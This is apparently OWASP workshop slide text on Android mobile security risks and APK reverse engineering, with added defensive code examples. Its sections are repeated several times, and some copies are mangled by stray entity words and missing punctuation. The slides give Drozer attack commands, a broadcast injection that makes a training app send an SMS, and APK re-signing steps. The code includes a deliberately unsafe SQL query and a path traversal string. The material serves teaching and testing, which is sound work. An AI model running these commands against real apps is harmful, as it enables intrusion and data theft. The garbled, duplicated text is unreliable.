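        field.setInputType(InputType.TYPE_CLASS_TEXT
                | InputType.TYPE_TEXT_VARIATION_PASSWORD
                | InputType.TYPE_TEXT_FLAG_NO_SUGGESTIONS);
        field.setCustomSelectionActionModeCallback(new ActionMode.Callback() {
            @Override public boolean onCreateActionMode(ActionMode mode, Menu menu) { return false; }
            @Override public boolean onPrepareActionMode(ActionMode mode, Menu menu) { return false; }
            @Override public boolean onActionItemClicked(ActionMode mode, MenuItem item) { return false; }
            @Override public void onDestroyActionMode(ActionMode mode) { }
        });
    }
}
```

The redaction is a safety net, not a substitute for the first rule: the value that never reaches a Log call cannot show up in adb logcat during the test described above.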
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
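The last mitigation here and the "use encryption for local storage / never MODE_WORLD_READABLE" points from M2 share one example. It is added for this transcript and is not the slides' code: the key is derived from the user's passphrase with PBKDF2 at use time, so only the salt, IV and ciphertext are ever written, into SharedPreferences opened with MODE_PRIVATE. The file name, iteration count and AES-GCM choice are assumptions; PBKDF2WithHmacSHA256 and java.util.Base64 need Android API 26.

```java
import android.content.Context;
import android.content.SharedPreferences;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Base64;
import javax.crypto.AEADBadTagException;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

/** Password-bound local storage (added example; file name and parameters are assumptions). */
public final class PasswordBoundStore {
    private static final String PREFS = "secrets";           // hypothetical preferences file
    private static final int PBKDF2_ITERATIONS = 100_000;    // raise as devices allow
    private static final int SALT_BYTES = 16, IV_BYTES = 12, TAG_BITS = 128;
    private final SharedPreferences prefs;
    private final SecureRandom rng = new SecureRandom();

    public PasswordBoundStore(Context ctx) {
        // MODE_PRIVATE: readable only by this app's UID. MODE_WORLD_READABLE is the finding from M2.
        this.prefs = ctx.getSharedPreferences(PREFS, Context.MODE_PRIVATE);
    }

    /** AES-256 key from the passphrase and a per-entry salt; the key itself is never persisted. */
    static SecretKey deriveKey(char[] passphrase, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(passphrase, salt, PBKDF2_ITERATIONS, 256);
        byte[] raw = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256").generateSecret(spec).getEncoded();
        spec.clearPassword();
        return new SecretKeySpec(raw, "AES");
    }

    public void put(String name, String plaintext, char[] passphrase) throws Exception {
        byte[] salt = new byte[SALT_BYTES], iv = new byte[IV_BYTES];
        rng.nextBytes(salt);
        rng.nextBytes(iv);                                   // fresh IV per encryption, mandatory for GCM
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, deriveKey(passphrase, salt), new GCMParameterSpec(TAG_BITS, iv));
        byte[] ct = c.doFinal(plaintext.getBytes(StandardCharsets.UTF_8));
        prefs.edit().putString(name, b64(salt) + ":" + b64(iv) + ":" + b64(ct)).apply();
    }

    /** Null when the entry is missing, malformed, or the passphrase is wrong (GCM tag check fails). */
    public String get(String name, char[] passphrase) throws Exception {
        String stored = prefs.getString(name, null);
        if (stored == null) return null;
        String[] parts = stored.split(":");
        if (parts.length != 3) return null;
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, deriveKey(passphrase, unb64(parts[0])),
               new GCMParameterSpec(TAG_BITS, unb64(parts[1])));
        try {
            return new String(c.doFinal(unb64(parts[2])), StandardCharsets.UTF_8);
        } catch (AEADBadTagException e) {
            return null;                                     // wrong passphrase or tampered data
        }
    }

    private static String b64(byte[] b) { return Base64.getEncoder().encodeToString(b); }
    private static byte[] unb64(String s) { return Base64.getDecoder().decode(s); }
}
```

Pulling this app's /data/data directory with adb, as in the M2 test, yields only salt, IV and ciphertext; the NQ Vault case on the previous slide is the opposite design, where what is on the device is enough to decrypt.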
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
– Another application via intent/content provider
– Shared file
– Server response
– Third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
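The three injection types the scanner.provider modules look for (local SQL injection, path traversal, intent injection), each with the vulnerable form and its fix. Added example for this transcript, not the slides' or any project's code; the notes table, the export directory, and SettingsActivity are hypothetical.

```java
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.net.Uri;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;

/** Client-side injection guards (added example; table, directory and Activity names are assumptions). */
public final class ClientSideInjectionGuards {
    private ClientSideInjectionGuards() {}

    /** VULNERABLE, kept for contrast: concatenation lets input such as "' OR 1=1 --" rewrite the query. */
    static Cursor findNoteUnsafe(SQLiteDatabase db, String title) {
        return db.rawQuery("SELECT id, body FROM notes WHERE title = '" + title + "'", null);
    }

    /** FIXED: bound parameter; the input is data and can never become SQL syntax. */
    static Cursor findNote(SQLiteDatabase db, String title) {
        return db.query("notes", new String[] {"id", "body"}, "title = ?", new String[] {title},
                        null, null, null);
    }

    /**
     * Content-provider file access: canonicalise and refuse anything outside the export directory.
     * A request like "../../shared_prefs/secrets.xml" resolves outside root and is rejected.
     */
    static File resolveExported(Context ctx, String requestedName) throws FileNotFoundException {
        try {
            File root = new File(ctx.getFilesDir(), "export").getCanonicalFile();   // hypothetical directory
            File target = new File(root, requestedName).getCanonicalFile();
            if (!target.getPath().startsWith(root.getPath() + File.separator)) {
                throw new FileNotFoundException("path escapes export directory");
            }
            return target;
        } catch (IOException e) {
            throw new FileNotFoundException("cannot resolve " + requestedName);
        }
    }

    /** Internal navigation: an explicit Intent names the class, so no other app's intent-filter can claim it. */
    static Intent openSettings(Context ctx, String userId) {
        return new Intent(ctx, SettingsActivity.class).putExtra("userId", userId);   // hypothetical Activity
    }

    /** Leaving the app is what implicit Intents are for; just never carry secrets in their extras. */
    static Intent openHelpPage() {
        return new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    }
}
```

The same contrast applies to the "server response" and "third party website" sources on the first M7 slide: whatever enters through a WebView or an API reply is handled by the fixed forms as data, and by the unsafe form as code.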
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → Java
Decompiling – Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
[Screenshots: JD-GUI and Luyten output]
Disassembling
DEX → Smali
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modify Smali Files
Demo
General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology for finding those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– Plain text configuration files
– Cookie stores
– SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on /sdcard before and after installing the application
• Analyze the package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences files are NOT MODE_WORLD_READABLE
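Added example, not code from the workshop: a check that turns the "adb pull /data/data/<package>" step into an automated review of the "how to find" and mitigation slides above, by parsing the output of `adb shell ls -lR /data/data/<package>` and flagging the permission bits that MODE_WORLD_READABLE / MODE_WORLD_WRITEABLE (or a careless chmod) leave behind. The package name and the listing are constructed.

```python
"""Flag app-private files that any other app on the device can read or write.

Added example, not from the slides: post-processes the listing from
`adb shell ls -lR /data/data/<package>`. Package name and listing are
constructed for the demonstration.
"""
import re
from dataclasses import dataclass
from typing import List

# Accepts the toybox form "-rw-rw---- 1 u0_a80 u0_a80 34 2016-02-24 10:00 f"
# and the older toolbox form "-rw-rw---- u0_a80 u0_a80 34 2016-02-24 10:00 f"
_ENTRY = re.compile(
    r"^([-dlcbps][rwxsStT-]{9})\s+(?:\d+\s+)?\S+\s+\S+\s+(?:\d+\s+)?"
    r"\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}\s+(.+)$")


@dataclass
class Exposure:
    path: str
    mode: str
    issues: List[str]


def world_access(mode: str) -> List[str]:
    """Issues implied by a 10-character mode string such as '-rw-rw-r--'."""
    issues = []
    if mode[7] == "r":
        issues.append("world-readable")
    if mode[8] == "w":
        issues.append("world-writable")
    if mode[0] != "d" and mode[9] in "xt":   # o+x on a directory is only traversal
        issues.append("world-executable")
    return issues


def scan_listing(listing: str, app_dir: str) -> List[Exposure]:
    """Parse `ls -lR` output rooted at app_dir; return entries others can touch."""
    current = app_dir
    found = []
    for line in listing.splitlines():
        line = line.rstrip()
        if not line:
            continue
        if line.startswith("/") and line.endswith(":"):
            current = line[:-1]              # "-R" prints one header per directory
            continue
        m = _ENTRY.match(line)
        if not m:
            continue                         # "total N" lines and other noise
        mode, name = m.group(1), m.group(2)
        if mode[0] == "l" or name in (".", ".."):
            continue                         # symlinks always show rwxrwxrwx
        issues = world_access(mode)
        if issues:
            found.append(Exposure("%s/%s" % (current, name), mode, issues))
    return found


# Constructed listing for a hypothetical package (not a real app).
SAMPLE_LISTING = """\
/data/data/com.example.vulnapp:
total 32
drwxrwx--x 1 u0_a80 u0_a80 4096 2016-02-24 10:00 cache
drwxrwx--x 1 u0_a80 u0_a80 4096 2016-02-24 10:00 databases
drwxrwx--x 1 u0_a80 u0_a80 4096 2016-02-24 10:00 shared_prefs
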